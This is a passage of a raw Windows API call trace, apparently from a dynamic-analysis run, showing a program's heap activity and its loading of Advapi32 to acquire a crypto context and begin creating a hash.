0x43cabc8 [0104.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0104.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0104.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0104.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0104.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0104.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0104.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0104.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.452] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0104.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0104.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0104.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0104.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0104.453] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0104.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0104.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0104.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0104.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0104.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0104.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0104.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0104.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.453] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0104.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0104.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0104.453] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0104.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0104.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0104.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0104.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2990 [0104.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0104.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0104.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0104.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac40 [0104.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0104.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0104.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0104.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0104.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0104.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0104.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0104.454] PeekMessageW (in: lpMsg=0x144e4cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4cc) returned 0 [0104.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0104.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0104.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0104.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0104.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0104.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0104.454] PeekMessageW (in: lpMsg=0x144e4cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4cc) returned 0 [0104.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0104.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0104.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0104.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0104.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0104.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0104.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0104.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0104.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0104.455] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0104.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0104.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0104.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0104.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0104.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0104.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0104.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0104.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0104.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0104.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.455] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0104.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0104.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0104.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0104.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0104.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0104.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0104.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0104.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0104.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0104.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0104.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0104.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0104.456] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0104.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0104.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad60 [0104.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0104.456] PeekMessageW (in: lpMsg=0x144e0d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e0d4) returned 0 [0104.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0104.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0104.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0104.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0104.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0104.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0104.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0104.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0104.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0104.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0104.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0104.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0104.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0104.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0104.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0104.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0104.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0104.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0104.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0104.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0104.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0104.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0104.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0104.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0104.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0104.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0104.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0104.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0104.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0104.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0104.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0104.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0104.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0104.458] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0104.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0104.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0104.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0104.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0104.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0104.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0104.459] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0104.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0104.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0104.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0104.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0104.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0104.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0104.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0104.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0104.459] CryptAcquireContextA (in: phProv=0x144e0a8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e0a8*=0x41a5250) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0104.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0104.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0104.461] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0104.461] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0104.462] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0104.462] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0104.462] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0104.462] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0104.462] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.462] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0104.462] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, 